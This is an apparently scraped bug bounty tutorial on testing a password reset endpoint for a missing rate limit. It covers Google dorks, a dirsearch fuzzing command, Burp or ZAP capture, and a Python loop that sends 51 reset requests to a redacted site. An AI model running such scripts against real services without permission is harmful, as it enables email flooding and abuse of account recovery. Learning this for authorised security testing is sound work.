.png)
6 months ago
18 BOOK THIS SPACE FOR AD
ARTICLE ADSteps:
Search for Potential Endpoints:Use Google dorks to identify potential password reset endpoints. For example, use the search query:
[ site:*.Redacted.com intitle:”Reset Password” | ”Forget Password” ]
Endpoints can be found in many ways, e.g
Fuzzing:
dirsearch -u https://Redacted.com/ --max-rate=5 -w ~/ur_wordlist.txt2. Capture the Request via Burp Suite or OWASP ZAP.
Fill out the form that triggers an email, using an email address that you own as the destination. For example, use free@Palestine.com.
the make a request and view response [Maybe you can notice whether there is a rate limit or not at response]
3. Use it “Burp Suite or OWASP ZAP” to send more than 50 requests to the email you own, in less than 10 seconds.
I created python code that helps me do this in another way:
import requestsurl = "https://captest.Redacted.com/Account/RequestPassword"
headers = {
"Host": "captest.Redacted.com",
"Content-Length": "155",
"Content-Type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
}
data = {
"UserName": "free@Palestine.com",
}
# Make 50 requests
for _ in range(51):
response = requests.post(url, headers=headers, data=data)
print(f"Response status code: {response.status_code}")
Bengali (Bangladesh) · 
English (United States) ·